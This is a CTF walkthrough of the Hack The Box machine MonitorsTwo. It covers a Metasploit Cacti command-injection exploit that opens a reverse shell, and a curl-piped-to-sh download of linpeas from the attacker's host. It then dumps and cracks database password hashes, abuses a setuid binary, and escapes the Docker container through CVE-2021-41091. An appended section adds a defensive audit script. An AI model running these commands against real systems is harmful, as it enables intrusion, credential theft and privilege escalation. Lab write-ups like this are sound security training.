Hey there, Cyber Warriors!
Get ready for a thrilling exploration of MonitorsTwo, a remarkable CTF challenge from Hack The Box! A test of wits and cybersecurity skills, MonitorsTwo takes you on a journey full of learning and discovery. In this post, we’ll share our adventure tackling this machine, focusing on our approach and strategy. So buckle up, as we recount our exciting expedition through MonitorsTwo!
First of all we will perform an Nmap scan:
sudo nmap -sT -n -Pn -sV -T4 -v 10.10.11.211
After scanning the host we get the following result:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
1042/tcp filtered afrog
1076/tcp filtered sns_credit
1864/tcp filtered paradym-31
9111/tcp filtered DragonIDSConsole
9929/tcp filtered nping-echo
16992/tcp filtered amt-soap-http
32776/tcp filtered sometimes-rpc15
62078/tcp filtered iphone-sync
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see the machine exposes several services, but we will check the "nginx" service on port 80 to see which application is running on the server:
We will see an application from "The Cacti Group" (Cacti); now we need to look up the installed version and what this application does:
We found a possible vulnerability in the installed version, so we will look for an exploit in "Metasploit":
search cacti
We will check the exploit "exploit/linux/http/cacti_unauthenticated_cmd_injection" to try to obtain a reverse shell, but before doing that we will look at more information about this exploit:
show options
Now we will configure some of these parameters:
set RHOSTS 10.10.11.211
set RPORT 80
set SRVHOST 10.10.16.56
set LHOST 10.10.16.56
set LPORT 443
set target 0
Now we can run the exploit and we will receive a reverse shell:
Now we need to enumerate the host to discover more information and try to gain user access:
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
We see the first hint that we are inside a container (the hostname mapped to our IP):
cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.19.0.3 50bca5e748b0
Now we will use the script "linpeas.sh" to enumerate the machine. To do that we need to download the latest release of the script:
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh >> linpeas.sh
After that we will start an HTTP server with Python to serve this script to our target:
python3 -m http.server 80
Once we have our server, we will download the "linpeas.sh" script from the reverse shell and run it:
curl 10.10.16.56/linpeas.sh | sh
Apparently we are inside a Docker container. We know this because "linpeas.sh" reports the following:
                              ╔═══════════╗
══════════════════════════════╣ Container ╠══════════════════════════════
                              ╚═══════════╝
╔══════════╣ Container related tools present (if any):
╔══════════╣ Am I Containered?
╔══════════╣ Container details
╔══╣ Is this a container? ........... docker
╔══╣ Any running containers? ........ No
╔══════════╣ Docker Container details
╔══╣ Am I inside Docker group ....... No
╔══╣ Looking and enumerating Docker Sockets (if any):
╔══╣ Docker version ................. Not Found
╔══╣ Vulnerable to CVE-2019-5736 .... Not Found
╔══╣ Vulnerable to CVE-2019-13139 ... Not Found
╔══╣ Rootless Docker? ............... No
╔══════════╣ Container & breakout enumeration
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout
╔══╣ Container ID ................... 50bca5e748b0
╔══╣ Container Full ID .............. 50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
╔══╣ Seccomp enabled? ............... enabled
╔══╣ AppArmor profile? .............. docker-default (enforce)
╔══╣ User proc namespace? ........... enabled 0 0 4294967295
╔══╣ Vulnerable to CVE-2019-5021 .... No
╔══╣ Breakout via mounts
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts
╔══╣ /proc mounted? ................. No
╔══╣ /dev mounted? .................. No
╔══╣ Run ushare ..................... No
╔══╣ release_agent breakout 1........ No
╔══╣ release_agent breakout 2........ No
╔══╣ core_pattern breakout .......... No
╔══╣ binfmt_misc breakout ........... No
╔══╣ uevent_helper breakout ......... No
╔══╣ is modprobe present ............ No
╔══╣ DoS via panic_on_oom ........... No
╔══╣ DoS via panic_sys_fs ........... No
╔══╣ DoS via sysreq_trigger_dos ..... No
╔══╣ /proc/config.gz readable ....... No
╔══╣ /proc/sched_debug readable ..... Yes
╔══╣ /proc/*/mountinfo readable ..... No
╔══╣ /sys/kernel/security present ... Yes
╔══╣ /sys/kernel/security writable .. No
We also get the following information about the mounted files:
╔══════════╣ Interesting Files Mounted
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/4Z77R4WYM6X4BLW7GXAJOAA4SJ:/var/lib/docker/overlay2/l/Z4RNRWTZKMXNQJVSRJE4P2JYHH:/var/lib/docker/overlay2/l/CXAW6LQU6QOKNSSNURRN2X4JEH:/var/lib/docker/overlay2/l/YWNFANZGTHCUIML4WUIJ5XNBLJ:/var/lib/docker/overlay2/l/JWCZSRNDZSQFHPN75LVFZ7HI2O:/var/lib/docker/overlay2/l/DGNCSOTM6KEIXH4KZVTVQU2KC3:/var/lib/docker/overlay2/l/QHFZCDCLZ4G4OM2FLV6Y2O6WC6:/var/lib/docker/overlay2/l/K5DOR3JDWEJL62G4CATP62ONTO:/var/lib/docker/overlay2/l/FGHBJKAFBSAPJNSTCR6PFSQ7ER:/var/lib/docker/overlay2/l/PDO4KALS2ULFY6MGW73U6QRWSS:/var/lib/docker/overlay2/l/MGUNUZVTUDFYIRPLY5MR7KQ233:/var/lib/docker/overlay2/l/VNOOF2V3SPZEXZHUKR62IQBVM5:/var/lib/docker/overlay2/l/CDCPIX5CJTQCR4VYUUTK22RT7W:/var/lib/docker/overlay2/l/G4B75MXO7LXFSK4GCWDNLV6SAQ:/var/lib/docker/overlay2/l/FRHKWDF3YAXQ3LBLHIQGVNHGLF:/var/lib/docker/overlay2/l/ZDJ6SWVJF6EMHTTO3AHC3FH3LD:/var/lib/docker/overlay2/l/W2EMLMTMXN7ODPSLB2FTQFLWA3:/var/lib/docker/overlay2/l/QRABR2TMBNL577HC7DO7H2JRN2:/var/lib/docker/overlay2/l/7IGVGYP6R7SE3WFLYC3LOBPO4Z:/var/lib/docker/overlay2/l/67QPWIAFA4NXFNM6RN43EHUJ6Q,upperdir=/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/diff,workdir=/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/work,xino=off)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (ro,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (ro,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (ro,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/cpuset type cgroup (ro,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/perf_event type cgroup (ro,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (ro,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (ro,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/memory type cgroup (ro,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/blkio type cgroup (ro,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/rdma type cgroup (ro,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/pids type cgroup (ro,nosuid,nodev,noexec,relatime,pids)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
**/dev/sda2 on /entrypoint.sh type ext4 (rw,relatime)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime)**
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/acpi type tmpfs (ro,relatime)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/sched_debug type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/scsi type tmpfs (ro,relatime)
tmpfs on /sys/firmware type tmpfs (ro,relatime)
We will also find the following script. We can only read it, nothing more:
╔══════════╣ Possible Entrypoints
-rw-r--r-- 1 root root 648 Jan 5 11:37 /entrypoint.sh
We will look further into the "/entrypoint.sh" script to understand what it does. This script gives us a lot of information: it contains the MySQL root credentials, so we can enumerate the MySQL service and see the internal information:
#!/bin/bash
set -ex
wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
set -- apache2-foreground "$@"
fi
exec "$@"
Linpeas also gives us more information about the container capabilities:
╔══════════╣ Container Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#capabilities-abuse-escape
Current: cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap=eip
Bounding set =cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: cap_chown,!cap_dac_override,!cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,!cap_linux_immutable,cap_net_bind_service,!cap_net_broadcast,!cap_net_admin,cap_net_raw,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,cap_sys_chroot,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_mknod,!cap_lease,cap_audit_write,!cap_audit_control,cap_setfcap,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
secure-no-ambient-raise: no (unlocked)
uid=33(root) euid=0(root)
gid=33(www-data)
groups=33(www-data)
Guessed mode: UNCERTAIN (0)
Linpeas also gives us information about files with the SUID bit set:
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 87K Feb 7 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Feb 7 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 52K Feb 7 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 58K Feb 7 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Feb 7 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 31K Oct 14 2020 /sbin/capsh
-rwsr-xr-x 1 root root 55K Jan 20 2022 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 35K Jan 20 2022 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 71K Jan 20 2022 /bin/su
If we look up the file "/sbin/capsh" online we find the following information on how this binary can be abused for privilege escalation (https://gtfobins.github.io/gtfobins/capsh/):
Shell
It can be used to break out from restricted environments by spawning an interactive system shell.
capsh --
SUID
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
sudo install -m =xs $(which capsh) .
./capsh --gid=0 --uid=0 --
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo capsh --
We will run this method in our reverse shell to check whether we can gain root privileges:
/sbin/capsh --gid=0 --uid=0 --
But apparently this is not the way to break out of the container. We need to enumerate more. We will enumerate the cacti database, because we have all the information we need to do that:
mysql --host=db --user=root --password=root cacti -e "show tables"
After executing this command we will see several tables, but the one we need is the "user_auth" table, because it stores something special:
mysql --host=db --user=root --password=root cacti -e "select * from user_auth"
We have discovered a new user together with a password hash, which is very interesting:
id username password realm full_name email_address must_change_password password_change show_tree show_list show_preview graph_settings login_opts policy_graphs policy_trees policy_hosts policy_graph_templates enabled lastchange lastlogin password_history locked failed_attempts lastfail reset_perms
1 admin $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC 0 Jamie Thompson admin@monitorstwo.htb on on on on on 2 1 1 1 1 on -1 -1 -1 0 0 663348655
3 guest 43e9a4ab75570f5b 0 Guest Account on on on on on 3 1 1 1 1 1 -1 -1 -1 0 0 0
4 marcus $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C 0 Marcus Brune marcus@monitorstwo.htb on on on on 1 1 1 1 1 on -1 -1 on 0 0 2135691668
We can try to brute-force the hash with John the Ripper to discover the password for the user "marcus":
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
We have discovered the password for the user "marcus":
┌──(david㉿hsbox)-[~/hackTheBox/monitorsTwo]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
<replaced> (?)
1g 0:00:03:06 DONE (2023-05-24 15:23) 0.005353g/s 45.66p/s 45.66c/s 45.66C/s gostosa..figueroa
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We will check whether this username and password work over SSH:
ssh marcus@10.10.11.211
We now have access to the user flag:
After that we will look for more information to gain root access. The first hint is the message "You have mail", which we see after logging in through SSH:
We need to go to the mail directory on Linux, where we will find the marcus mailbox. After that we can display the content of the mailbox:
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of
Dear all,
We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.
CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.
CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.
CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.
We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.
Best regards,
Administrator
CISO
Monitor Two
Security Team
The message says that a few vulnerabilities have been discovered recently. After checking two of them I tried CVE-2021-41091. Exploiting this vulnerability for privilege escalation is exactly what we need. First of all we need to go back to the container, where we are root, and prepare a SUID binary inside the container:
chmod u+s /bin/bash
After that we will enumerate the directory where the Docker container filesystem is mounted on the host:
marcus@monitorstwo:/var/mail$ findmnt
TARGET SOURCE FSTYPE OPTIONS
/ /dev/sda2 ext4 rw,relatime
├─/sys sysfs sysfs rw,nosuid,nodev,noexec,relatime
│ ├─/sys/kernel/security securityfs securityfs rw,nosuid,nodev,noexec,relatime
│ ├─/sys/fs/cgroup tmpfs tmpfs ro,nosuid,nodev,noexec,mode=755
│ │ ├─/sys/fs/cgroup/unified cgroup2 cgroup2 rw,nosuid,nodev,noexec,relatime,nsdelegate
│ │ ├─/sys/fs/cgroup/systemd cgroup cgroup rw,nosuid,nodev,noexec,relatime,xattr,name=systemd
│ │ ├─/sys/fs/cgroup/perf_event cgroup cgroup rw,nosuid,nodev,noexec,relatime,perf_event
│ │ ├─/sys/fs/cgroup/memory cgroup cgroup rw,nosuid,nodev,noexec,relatime,memory
│ │ ├─/sys/fs/cgroup/rdma cgroup cgroup rw,nosuid,nodev,noexec,relatime,rdma
│ │ ├─/sys/fs/cgroup/cpu,cpuacct cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct
│ │ ├─/sys/fs/cgroup/blkio cgroup cgroup rw,nosuid,nodev,noexec,relatime,blkio
│ │ ├─/sys/fs/cgroup/devices cgroup cgroup rw,nosuid,nodev,noexec,relatime,devices
│ │ ├─/sys/fs/cgroup/freezer cgroup cgroup rw,nosuid,nodev,noexec,relatime,freezer
│ │ ├─/sys/fs/cgroup/pids cgroup cgroup rw,nosuid,nodev,noexec,relatime,pids
│ │ ├─/sys/fs/cgroup/cpuset cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpuset
│ │ ├─/sys/fs/cgroup/net_cls,net_prio cgroup cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio
│ │ └─/sys/fs/cgroup/hugetlb cgroup cgroup rw,nosuid,nodev,noexec,relatime,hugetlb
│ ├─/sys/fs/pstore pstore pstore rw,nosuid,nodev,noexec,relatime
│ ├─/sys/fs/bpf none bpf rw,nosuid,nodev,noexec,relatime,mode=700
│ ├─/sys/kernel/debug debugfs debugfs rw,nosuid,nodev,noexec,relatime
│ ├─/sys/kernel/tracing tracefs tracefs rw,nosuid,nodev,noexec,relatime
│ ├─/sys/fs/fuse/connections fusectl fusectl rw,nosuid,nodev,noexec,relatime
│ └─/sys/kernel/config configfs configfs rw,nosuid,nodev,noexec,relatime
├─/proc proc proc rw,nosuid,nodev,noexec,relatime
│ ├─/proc/sys/fs/binfmt_misc systemd-1 autofs rw,relatime,fd=28,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=15271
│ └─/proc/sys/fs/binfmt_misc binfmt_misc binfmt_misc rw,nosuid,nodev,noexec,relatime
├─/dev udev devtmpfs rw,nosuid,noexec,relatime,size=1966928k,nr_inodes=491732,mode=755
│ ├─/dev/pts devpts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000
│ ├─/dev/shm tmpfs tmpfs rw,nosuid,nodev
│ ├─/dev/hugepages hugetlbfs hugetlbfs rw,relatime,pagesize=2M
│ └─/dev/mqueue mqueue mqueue rw,nosuid,nodev,noexec,relatime
├─/run tmpfs tmpfs rw,nosuid,nodev,noexec,relatime,size=402608k,mode=755
│ ├─/run/lock tmpfs tmpfs rw,nosuid,nodev,noexec,relatime,size=5120k
│ ├─/run/docker/netns/4475afc16c8d nsfs[net:[4026532570]]
│ │ nsfs rw
│ ├─/run/user/1000 tmpfs tmpfs rw,nosuid,nodev,relatime,size=402608k,mode=700,uid=1000,gid=1000
│ └─/run/docker/netns/8389632fcb75 nsfs[net:[4026532631]]
│ nsfs rw
├─/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
│ overlay overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/756FTPFO4AE7HBWVGI5TXU76FU:/var/lib/docker/overlay2/l/XKE4ZK5GJUTHXKVYS4MQMJ3NOB:/var/lib/docker/overlay2/l/3JPYTR54WWK2
├─/var/lib/docker/containers/e2378324fced58e8166b82ec842ae45961417b4195aade5113fdc9c6397edc69/mounts/shm
│ shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k
├─/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
│ overlay overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/4Z77R4WYM6X4BLW7GXAJOAA4SJ:/var/lib/docker/overlay2/l/Z4RNRWTZKMXNQJVSRJE4P2JYHH:/var/lib/docker/overlay2/l/CXAW6LQU6QOK
└─/var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/mounts/shm
shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k
Having found the directory "/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged", we can perform the "Directory Traversal & Command Execution Attack". We need to go back to the SSH session and execute the following command:
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p
And finally we have access to the root flag:
bash-5.1# whoami
root
bash-5.1# ls /root
cacti root.txt
bash-5.1# cat root.txt
cat: root.txt: No such file or directory
bash-5.1# cat /root/root.txt
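As an added defender-side example (not part of the original write-up), the POSIX shell audit below checks a Docker data directory for the CVE-2021-41091 condition described in the mail (a data directory searchable by other users, which lets an unprivileged host user reach a container's merged overlay root and run a setuid binary planted there, exactly the path used above), reports any setuid/setgid files inside merged overlay directories, and applies the permission fix. The function names are my own and `make_demo_fixture` builds a constructed, throwaway layout under a temp directory so the audit runs offline; GNU `stat` and `find` are assumed.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit a Docker data directory
# for the CVE-2021-41091 traversal condition and for setuid/setgid files inside
# container root filesystems (merged overlay2 directories). GNU stat/find assumed.
#
# Usage: audit_docker_dir /var/lib/docker   (run as root against a real engine)

# Return 0 when "others" have the execute/search bit on the given path.
# That bit is what let an unprivileged host user walk into overlay2/.../merged.
world_searchable() {
    perm=$(stat -c %a "$1")        # e.g. 711 or 1777; the last digit is "other"
    other=$((perm % 10))
    [ $((other & 1)) -eq 1 ]
}

# List regular files with a setuid or setgid bit under any merged container root.
# A root-owned /bin/bash with mode 4755 here is the pattern used in the write-up.
find_suid_in_overlays() {
    find "$1/overlay2" -path '*/merged/*' -type f -perm /6000 2>/dev/null || true
}

# Print one WARN line per finding; the last line printed is the finding count.
audit_docker_dir() {
    root="$1"
    issues=0
    if world_searchable "$root"; then
        echo "WARN: $root is searchable by others (CVE-2021-41091 condition)"
        issues=$((issues + 1))
    fi
    for f in $(find_suid_in_overlays "$root"); do
        echo "WARN: setuid/setgid file inside a container rootfs: $f"
        issues=$((issues + 1))
    done
    echo "$issues"
}

# Mitigation for a host that cannot upgrade the engine yet: remove all "other"
# bits on the data directory so non-root users cannot traverse it. Upgrading to
# Moby 20.10.9 or later (which restricts the directory itself) remains the fix.
harden_docker_dir() {
    chmod o-rwx "$1"
}

# Constructed throwaway layout that reproduces the vulnerable state:
# a data dir searchable by others plus a setuid "bash" inside a merged root.
make_demo_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/overlay2/demo-container/merged/bin"
    printf '#!/bin/sh\n' > "$d/overlay2/demo-container/merged/bin/bash"
    chmod 4755 "$d/overlay2/demo-container/merged/bin/bash"  # like chmod u+s
    chmod 711 "$d"                                           # o+x: traversable
    echo "$d"
}
```

The setuid finding remains after hardening on purpose: the directory fix stops host users reaching it, but the planted binary is evidence of compromise inside the container and should be investigated rather than silently chmod-ed away.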
In my opinion this machine has been different. You learn how vulnerabilities can give you fast access to an environment, but after that you do not always need to exploit another vulnerability to escalate privileges. However, it has been interesting because I learned about containers and how we can break out of them.
Links:
https://exploit-notes.hdks.org/exploit/container/docker/moby-docker-engine-privesc/